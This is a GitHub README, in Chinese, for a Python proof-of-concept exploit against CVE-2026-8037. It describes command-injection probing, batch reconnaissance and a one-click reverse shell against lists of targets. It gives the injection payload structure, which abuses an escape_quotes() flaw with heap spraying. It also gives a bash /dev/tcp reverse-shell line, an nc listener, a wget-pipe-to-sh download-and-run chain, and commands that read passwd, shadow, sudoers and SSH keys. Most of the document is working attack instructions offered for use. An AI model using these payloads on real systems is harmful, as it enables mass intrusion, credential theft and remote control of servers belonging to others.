Caster-chen/CVE-2026-8037-POC
GitHub: Caster-chen/CVE-2026-8037-POC
针对特定编号漏洞的 Python 利用工具,提供命令注入探测、批量信息收集与一键反弹 Shell 功能。
Stars: 0 | Forks: 0
# CVE-2026-8037-POC
包括能执行的命令探测和一键getshell(需要服务器部署服务)
pco.yaml 配合nuclei可以快速探测
## 快速开始
### 交互模式
python go.py
输入目标 URL → 选功能菜单即可。
### 探测目标
# 快速探测(8 项基本信息)
python go.py -t https://IP:PORT --probe fast
# 深度探测(全部命令:30+ 项)
python go.py -t https://IP:PORT --probe deep
# 批量探测
python go.py -f vulnerable_targets.txt --probe fast
### 执行命令
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# 批量并发(20 线程)
python go.py -f targets.txt -c "hostname" --batch 20
### 一键反弹 Shell
在攻击机开两个终端:
# 终端 1 - HTTP 服务(提供 rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# 终端 2 - 等待反弹
nc -lvnp 8088
然后发 payload:
# 单目标
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# 批量(串行,一次只能接一个)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
脚本发送前会打印准备步骤。
## 深度探测内容
| 类别 | 命令 |
|------|------|
| 基本信息 | hostname, uname -a, kernel, OS release, uptime |
| 用户 | id, whoami, users/w/who |
| 网络 | ifconfig, route, arp, listening ports, connections, iptables |
| 系统 | processes, cpuinfo, meminfo, disk, mount |
| 文件 | ls / /root /tmp /home /etc |
| 配置 | crontab, passwd, shadow, sudoers, SSH keys |
| 扩展 | config search, scripts, docker, containers |
## 注入原理
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
- `apiuser="''''"` 触发 escape_quotes() 未 null 终止缺陷
- `g0~g60` 堆喷射 61 次,提高成功率
- `'; <命令> #` 闭合上下文,`#` 注释后续
### 长度限制
不用 echo tag 可用 34 字符:
wget -O- IP:PORT|sh (31 字符)
管道链:wget 下载 → sh 执行 → bash 反弹回指定端口。
## 参数一览
| 参数 | 作用 |
|------|------|
| `-t, --target URL` | 目标地址 |
| `-f, --file FILE` | 目标列表文件 |
| `-l, --lhost IP` | 攻击机 IP |
| `-p, --lport PORT` | HTTP 服务端口 (默认 8087) |
| `-n, --ncport PORT` | nc 监听端口 (默认 8088) |
| `-c, --cmd CMD` | 执行命令 |
| `--probe fast/deep` | 快速/深度探测 |
| `--batch N` | 批量并发数 (默认串行) |
标签:Google, Nuclei, Python, 命令注入, 插件系统, 无后门, 无线安全, 逆向工具